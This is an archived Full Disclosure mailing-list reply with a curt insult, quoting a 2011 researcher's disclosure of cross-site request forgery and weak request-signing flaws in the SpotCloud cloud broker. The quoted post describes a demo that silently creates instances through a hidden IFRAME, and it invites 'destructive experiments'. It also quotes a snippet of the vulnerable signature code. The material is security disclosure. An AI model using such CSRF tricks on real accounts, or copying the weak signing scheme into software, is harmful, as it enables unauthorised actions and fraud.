Full Disclosure mailing list archives
Re: SploitCloud: exploiting cloud brokers for fun and profit
From: xD 0x41 <secn3t () gmail com>
Date: Fri, 11 Nov 2011 06:22:09 +1100
Lame. Sorry but, it just is. Your a lamer dude. Ill makesure to blog this for you. On 10 November 2011 06:25, Sam Johnston <samj () samj net> wrote:
Apologies for the HTML — too many inline links. Sam SploitCloud: exploiting cloud brokers for fun and profit<http://samj.net/2011/10/sploitcloud.html> My friends at Enomaly <http://www.enomaly.com/> have been beating<http://twitter.com/#%21/ruv/status/129928434079109121> up <http://twitter.com/#%21/ruv/status/129929111526318081> on<http://twitter.com/#%21/ruv/status/129934534870446080> Amazon Web Services (AWS) <http://aws.amazon.com/> over the XML signature element wrapping <http://dl.acm.org/citation.cfm?id=1103026> vulnerability currently being overhyped<http://www.theregister.co.uk/2011/10/27/cloud_security/> by<http://www.fiercecio.com/techwatch/story/security-flaw-cloud-architectures-including-amazon-web-services/2011-10-28> the<http://www.pcworld.com/businesscenter/article/242598/researchers_demo_cloud_security_issue_with_amazon_aws_attack.html> press<http://www.networkworld.com/news/2011/102611-security-cloud-252406.html>, which is ironic given their security<http://www.securityfocus.com/archive/1/archive/1/500573/100/0/threaded> track<http://www.securityfocus.com/archive/1/archive/1/500573/100/0/threaded> record <http://www.securityfocus.com/archive/1/500989> and unfortunate given I rather like what Amazon have achieved. Back in March I reported multiple vulnerabilities<https://groups.google.com/group/spotcloudbuyers/browse_thread/thread/1993b3ab1643bfa2> in SpotCloud <http://www.spotcloud.com/> (including their having copied Amazon's vulnerable signatures<http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html>years after they were reported and fixed<http://www.jamesmurty.com/2008/12/31/aws-query-signature-version-2/>) and I was told I was unethical<https://groups.google.com/group/spotcloudbuyers/msg/237ffac277ea8bbe>and my report that they " *may not validate incoming web and/or API requests and if so, may be vulnerable to cross-site request forgery in which an attacker could make unauthorised management requests on behalf of a user*" was "unactionably vague<https://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95> ". To demonstrate the severity of the outstanding vulnerability go grab yourself a SpotCloud account<https://spotcloud.appspot.com/buyer/register>, charge it up <https://spotcloud.appspot.com/buyer/balance/topup> (ignoring PCI-DSS<http://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard>for a second given they're collecting credit card numbers via App Engine) and click the image below. I'll silently create an instance for you using a hidden IFRAME, but you're welcome to experiment with more destructive experiments like deleting existing instances and uploading malicious workloads. *Update:* If you look at the code you'll see the hourly rate is passed to the client as "*cost*" and presumably trusted on return (if not, why is it there?). I haven't seen a price manipulation vulnerability<http://www.symantec.com/connect/articles/common-security-vulnerabilities-e-commerce-systems>in over a decade, but I'm not tinkering with it because I don't fancy being accused of stealing from them or their providers. *Update:* While the consumer API <http://dl.enomaly.com/scbuyerapi> now uses OAuth, the provider API <http://dl.enomaly.com/scprovider> still uses Amazon's vulnerable signatures<http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html>for authentication: #sorts by key.lowercase(). ie A b c Dee e ffFf sorted_keys = sorted(parameters.keys(), key=lambda k: k.lower()) #concatenates key,value pairs. a=1,b=2,C=32 becomes "a1b2C32" data = ’’.join(key + parameters[key] for key in sorted_keys) #Data is now: ecp_usernamespotcloudusernameparamAvalueTimestamp2006-12-08T07:48:03Z digest = hmac.new(’spotcloudpassword’, data, sha).digest() This may have been safe over SSL were it not for the fact that client libraries (including python) typically don't validate the certificate chain by default. *Update:* Wells Fargo reports "CHECK CRD PURCHASE SPOT CLOUD ETOBICOKE CD" as "Unusual Activity" in emailed alert… canceling card, requesting re-issue. Should have used a virtual card. Wonder if Google know their App Engine poster child<http://googleappengine.blogspot.com/2011/03/enomaly-chooses-google-app-engine-for.html>is using it to collect credit card details? *Update:* It is believed that Private SpotCloud<http://spotcloud.com/Private.50.0.html>and Enomaly Elastic Computing Platform (ECP)<http://www.enomaly.com/Product-Overview.419.0.html>are also vulnerable to cross-site request forgery <http://en.wikipedia.org/wiki/Cross-site_request_forgery>, but without access to the software I have no way to verify. *Update:* This is how Enomaly deals with security researchers: <http://4.bp.blogspot.com/-XwLZ56N2Gjg/TrnalAPJ9qI/AAAAAAAAAYU/SY57-4azetI/s1600/spotcloud-suspended.png> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- SploitCloud: exploiting cloud brokers for fun and profit Sam Johnston (Nov 10)
- Re: SploitCloud: exploiting cloud brokers for fun and profit coderman (Nov 10)
- Re: SploitCloud: exploiting cloud brokers for fun and profit Jeffrey Walton (Nov 10)
- Re: SploitCloud: exploiting cloud brokers for fun and profit xD 0x41 (Nov 10)